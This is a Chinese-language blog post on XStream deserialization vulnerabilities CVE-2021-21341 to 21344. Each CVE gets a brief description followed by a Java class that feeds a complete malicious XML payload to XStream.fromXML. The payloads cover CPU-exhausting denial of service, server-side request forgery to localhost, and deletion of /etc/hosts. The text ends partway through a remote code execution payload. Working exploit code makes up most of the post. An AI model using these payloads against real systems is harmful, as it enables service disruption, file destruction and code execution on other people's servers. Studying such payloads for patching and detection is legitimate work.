XStream CVE漏洞
啦啦啦,我只是官网搬运工:https://x-stream.github.io/index.html
文章目录
CVE-2021-21341
漏洞概述:
在1.4.16版之前的XStream中,存在一个漏洞,该漏洞可能允许远程攻击者根据CPU类型或此类有效负载的并行执行,在目标系统上分配100%CPU时间,从而导致仅通过处理已处理的输入就导致拒绝服务的情况。
public class CVE202121341 {
public static void main(String[] args) {
String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" <comparator class='javafx.collections.ObservableList$1'/>\n" +
" </default>\n" +
" <int>3</int>\n" +
" <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
" <dataHandler>\n" +
" <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
" <is class='java.io.ByteArrayInputStream'>\n" +
" <buf></buf>\n" +
" <pos>-2147483648</pos>\n" +
" <mark>0</mark>\n" +
" <count>0</count>\n" +
" </is>\n" +
" <consumed>false</consumed>\n" +
" </dataSource>\n" +
" <transferFlavors/>\n" +
" </dataHandler>\n" +
" <dataLen>0</dataLen>\n" +
" </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
" <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\n" +
" </java.util.PriorityQueue>\n" +
"</java.util.PriorityQueue>";
XStream xstream = new XStream();
xstream.fromXML(xml);
}
}
CVE-2021-21342
漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,在解析时处理的流包含类型信息,以重新创建以前写入的对象。因此,XStream基于这些类型信息创建新的实例。攻击者可以操纵处理后的输入流并替换或注入对象,从而导致服务器端进行伪造请求
public class CVE202121342 {
public static void main(String[] args) {
String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
" <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
" <packet>\n" +
" <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
" <dataSource class='javax.activation.URLDataSource'>\n" +
" <url>http://localhost:8080/internal/:</url>\n" +
" </dataSource>\n" +
" </message>\n" +
" </packet>\n" +
" </indexMap>\n" +
" </comparator>\n" +
" </default>\n" +
" <int>3</int>\n" +
" <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
" <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
" </java.util.PriorityQueue>\n" +
"</java.util.PriorityQueue>";
XStream xstream = new XStream();
xstream.fromXML(xml);
}
}
CVE-2021-21343
漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,在解析时处理的流包含类型信息,以重新创建以前写入的对象。因此,XStream基于这些类型信息创建新的实例。攻击者可以操纵处理后的输入流并替换或注入对象,从而删除本地主机上的文件
public class CVE202121343 {
public static void main(String[] args) {
String xml ="<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
" <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
" <packet>\n" +
" <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
" <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>\n" +
" <part>\n" +
" <dataHead>\n" +
" <tail/>\n" +
" <head>\n" +
" <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>\n" +
" <len>3</len>\n" +
" <data>AQID</data>\n" +
" </data>\n" +
" </head>\n" +
" </dataHead>\n" +
" <contentTransferEncoding>base64</contentTransferEncoding>\n" +
" <msg>\n" +
" <it class='java.util.ArrayList$Itr'>\n" +
" <cursor>0</cursor>\n" +
" <lastRet>1</lastRet>\n" +
" <expectedModCount>4</expectedModCount>\n" +
" <outer-class>\n" +
" <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
" <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
" <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
" <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
" </outer-class>\n" +
" </it>\n" +
" <in class='java.io.FileInputStream'>\n" +
" <fd/>\n" +
" <channel class='sun.nio.ch.FileChannelImpl'>\n" +
" <closeLock/>\n" +
" <open>true</open>\n" +
" <threads>\n" +
" <used>-1</used>\n" +
" </threads>\n" +
" <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>\n" +
" <sockClient>\n" +
" <fileName>/etc/hosts</fileName>\n" +
" <unlinkFile>true</unlinkFile>\n" +
" </sockClient>\n" +
" <connectionSync/>\n" +
" </parent>\n" +
" </channel>\n" +
" <closeLock/>\n" +
" </in>\n" +
" </msg>\n" +
" </part>\n" +
" </dataSource>\n" +
" </message>\n" +
" <satellites/>\n" +
" <invocationProperties/>\n" +
" </packet>\n" +
" </indexMap>\n" +
" </comparator>\n" +
" </default>\n" +
" <int>3</int>\n" +
" <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
" <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
" </java.util.PriorityQueue>\n" +
"</java.util.PriorityQueue>";
XStream xstream = new XStream();
xstream.fromXML(xml);
}
}
CVE-2021-21344
漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,该漏洞可能允许远程攻击者仅通过操纵已处理的输入流来从远程主机加载并执行任意代码。
public class CVE202121344 {
public static void main(String[] args) {
String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
" <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
" <packet>\n" +
" <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
" <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n" +
" <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n" +
" <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n" +
" <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n" +
" <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>\n" +
" <uriProperties/>\n" +